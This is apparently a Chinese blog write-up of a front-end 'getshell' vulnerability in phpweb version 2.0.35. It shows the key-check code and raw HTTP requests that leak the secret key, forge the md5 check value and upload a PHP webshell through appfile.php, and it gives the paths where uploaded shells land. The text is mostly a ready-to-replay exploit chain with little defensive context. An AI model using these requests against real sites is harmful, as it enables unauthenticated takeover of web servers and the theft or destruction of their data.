影响范围

版本 2.0.35

测试环境：

windows 2008+PHPnow1.6.5+phpwebV2.0.35

秘钥加密方式

$k=md5(strrev($dbUser.$dbPass));
$h=$_SERVER["HTTP_REFERER"];
$t=$_POST["t"];
$m=$_POST["m"];
$act=$_POST["act"];
$path=$_POST["path"];

$md5=md5($k.$t);
if($m!=$md5){
        echo "ERROR: 安全性校验错误";
}

漏洞检测方法

1、获取秘钥

POST /3151/base/post.php HTTP/1.1
Host: 192.168.59.138
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 11

act=appcode

获取的秘钥：k=01a5b56136714988a0aa6d13cb73f82a&t=1579150020

将k的值拼接字符'a'：a6bd1d895fc946ed8d6a2446890cb7ce

2、使用md5加密

3、上传webshell

通过 appfile.php 上传的shell路径是/effect/source/bg/文件名.php
通过 appplus.php上传的shell路径是/update/ /文件名.php

POST /3151//base/appfile.php HTTP/1.1
Host: 192.168.59.138
Cache-Control: max-age=0
Origin: null
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryCznr39h1oUlUvOGG
Accept: */*
Referer: http://192.168.59.138/3151//base/appfile.php
Accept-Language: zh-cn
Cookie: Hm_lvt_a93ba41c8cfa578d8fa3f514694f399b=1570960058;
Host: 192.168.59.138
Content-Length: 726


------WebKitFormBoundaryCznr39h1oUlUvOGG
Content-Disposition: form-dAta;name='file';fIlename='configs.php'
Content-Type: application/octet-stream


------WebKitFormBoundaryCznr39h1oUlUvOGG
Content-Disposition: form-data; name='t'

a
------WebKitFormBoundaryCznr39h1oUlUvOGG
Content-Disposition: form-data; name='m'

a6bd1d895fc946ed8d6a2446890cb7ce
------WebKitFormBoundaryCznr39h1oUlUvOGG
Content-Disposition: form-data; name='act'

upload
------WebKitFormBoundaryCznr39h1oUlUvOGG
Content-Disposition: form-data; name='r_size'

28
------WebKitFormBoundaryCznr39h1oUlUvOGG
Content-Disposition: form-data; name='submit'

getshell
------WebKitFormBoundaryCznr39h1oUlUvOGG--

phpweb前台getshell

影响范围

测试环境：

漏洞检测方法

1、获取秘钥

2、使用md5加密

3、上传webshell

4、成功获取webshell

你可能感兴趣的:(phpweb前台getshell)